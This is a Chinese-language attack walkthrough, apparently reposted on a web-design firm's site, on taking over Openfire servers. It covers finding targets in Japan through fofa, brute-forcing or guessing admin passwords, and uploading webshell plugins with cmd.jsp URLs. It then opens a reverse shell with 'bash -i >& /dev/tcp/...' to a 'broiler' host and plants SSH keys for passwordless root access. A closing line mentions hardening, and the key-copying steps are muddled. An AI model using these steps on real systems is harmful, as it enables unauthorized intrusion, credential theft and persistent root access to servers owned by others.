本次***源于高校任務，在***過程中發(fā)現(xiàn)，對方IP地址段安裝有opernfire，服務器8080端口可以正常訪問，后面通過了解Openfire是開源的、基于可拓展通訊和表示協(xié)議(XMPP)、采用Java編程語言開發(fā)的實時協(xié)作服務器。 Openfire安裝和使用都非常簡單，并利用Web進行管理，單臺服務器可支持上萬并發(fā)用戶，一般在大型企業(yè)用的比較多。Openfire跟Jboss類似，也可以通過插件上傳來獲取Webshell，只是Openfire的插件需要修改代碼并進行編譯，經(jīng)過研究測試，只要有登錄賬號，通過上傳插件可以獲取webshell，一般獲取的權(quán)限都較高為root系統(tǒng)權(quán)限，國外服務器一般單獨給Openfire權(quán)限，下面是整個***過程。

創(chuàng)新互聯(lián)公司專注于嵐山網(wǎng)站建設服務及定制，我們擁有豐富的企業(yè)做網(wǎng)站經(jīng)驗。 熱誠為您提供嵐山營銷型網(wǎng)站建設，嵐山網(wǎng)站制作、嵐山網(wǎng)頁設計、嵐山網(wǎng)站官網(wǎng)定制、重慶小程序開發(fā)公司服務，打造嵐山網(wǎng)絡公司原創(chuàng)品牌,更為您提供嵐山網(wǎng)站排名全網(wǎng)營銷落地服務。

1.目標獲取

（1）fofa.so網(wǎng)站使用搜索body="Openfire,版本: " && country=JP，可以獲取日本存在的Openfire服務器。如圖1所示。

圖1搜索目標

2.暴力或者使用弱口令登錄系統(tǒng)

  一般弱口令admin/admin、admin/admin888、admin/123456，如果不是這些請直接使用burpsuite進行暴力破解，能夠正常訪問的網(wǎng)站，如圖2所示，openfire可能開放不同端口。

圖2openfire后臺登陸地址

3.進入后臺

  輸入密碼正確后，如圖3所示，進入后臺，可以查看服務器設置，查看用戶/用戶群，查看會話，分組聊天以及插件等信息。

圖3進入后臺

4.查看并上傳插件

  單擊插件，再其中可以看到所有的插件列表，在上傳插件下單擊上傳插件，選擇專門生成的openfire帶webshell的插件，如圖4所示。

圖4上傳插件

在本次測試中，從互聯(lián)網(wǎng)收集了連個插件，如圖5所示，均成功上傳。

圖5上傳帶webshell的插件

5.獲取webshell

（1）helloworld插件獲取webshell

 單擊服務器-服務器設置，如圖6所示，如果helloworld插件上傳并運行成功，則會在配置文件下面生成一個用戶接口設置。單擊該鏈接即可獲取webshel，如圖7所示。

圖6查看服務器設置

圖7獲取webshell

（2）broadcast插件獲取webshell

  通過url+ plugins/broadcast/webshell文件名稱來和獲取：

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/cmd.jsp?cmd=whoami

http://xxx.xxx.xxx.xxx:8080/plugins/broadcast/browser.jsp

  在helloworld插件中也可以通過地址來獲取

http://xxx.xxx.xxx.xxx:8080/plugins/helloworld/chakan.jsp

 如圖8，圖9所示，分別獲取broadcast的webshell以及查看當前用戶權(quán)限為root。

圖8獲取當前用戶權(quán)限

圖9獲取webshell

6.免root密碼登錄服務器

  ***到這里按照過去的思路應該已經(jīng)結(jié)束，不過筆者還想嘗試另外一種思路，雖然我們通過webshell可以獲取/etc/shadow文件，但該root及其它用戶的密碼明顯不是那么容易被破解的。服務器上面用ssh，能否利用公私鑰來解決訪問問題。

（1）反彈到肉雞

執(zhí)行一下命令，將該服務器反彈到肉雞服務器xxx.xxx.xxx.xxx的8080端口，需要提前使用nc監(jiān)聽8080端口，也即執(zhí)行“nc-vv -l -p 8080”如圖10所示。

圖10監(jiān)聽8080端口

（2）反彈shell到肉雞

執(zhí)行命令“bash -i>& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1”反彈到肉雞，如圖11所示，獲取一個反彈shell。

圖11反彈shell

7.實際操作流程

（1）遠程服務器生成公私鑰

 在被***的服務器上執(zhí)行“ssh-keygen -t rsa”命令，默認三次回車，如圖12所示，會在root/.ssh/目錄下生成id_rsa及id_rsa.pub，其中id_rsa為服務器私鑰，特別重要，id_rsa.pub為公鑰。

圖12在遠處服務器上生成公私鑰

（2）本地linux上生成公私鑰

 在本地linux上執(zhí)行命令“ssh-keygen -t rsa”生成公私鑰，將遠程服務器的id_rsa下載到本地，執(zhí)行命令“cat id_rsa > /root/.ssh/authorized_keys”命令，將遠處服務器的私鑰生成到authorized_keys文件。

（3）將本地公鑰上傳到遠程服務器上并生成authorized_keys

catid_rsa.pub >/root/.ssh/authorized_keys

（4）刪除多余文件

rmid_rsa.pub

rmid_rsa

（5）登錄服務器

  使用“sshroot@1xx.1xx.111.1xx”登錄服務器，不用輸入遠程服務器的密碼，達到完美登錄服務器的目的。

8總結(jié)

（1）Openfire需要獲取管理員帳號和密碼，目前通殺所有幫本。Openfire最新版本為4.1.5.

（2）可以通過burpsuite進行admin管理員帳號的暴力破解。

（3）使用openfire安全加固，可以使用強密碼，同時嚴格設置插件權(quán)限，建議除了必須的插件目錄外，禁用新創(chuàng)建目錄。

分享題目：OpenFire后臺插件上傳獲取webshell及免密碼登錄linux服務器
瀏覽路徑：http://jinyejixie.com/article46/gpgohg.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站設計、Google、營銷型網(wǎng)站建設、品牌網(wǎng)站設計、網(wǎng)站導航、微信小程序

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)